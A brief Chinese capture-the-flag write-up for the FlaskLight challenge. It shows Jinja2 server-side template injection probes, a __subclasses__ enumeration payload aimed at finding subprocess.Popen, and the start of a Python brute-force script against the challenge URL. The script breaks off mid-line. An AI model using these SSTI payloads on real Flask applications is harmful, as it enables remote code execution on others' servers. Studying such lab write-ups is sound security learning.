[CSCCTF 2019 Qual]FlaskLight 1
查看网页源代码,发现里面的提示
尝试输入url
http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.node3.buuoj.cn/?search={
{1*9}}
成功回显,说明存在ssti注入
使用{
{’’.class.mro[2].subclasses()}},可以爆出object类中所有子类,找出subprocess.Popen,copy大佬额exp。
import requests
import re
import html
import time
index = 0
for i in range(170, 1000):
try:
url = "http://xxxx/?search={
{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
r = requests.get(url)
res = re.findall("<h2>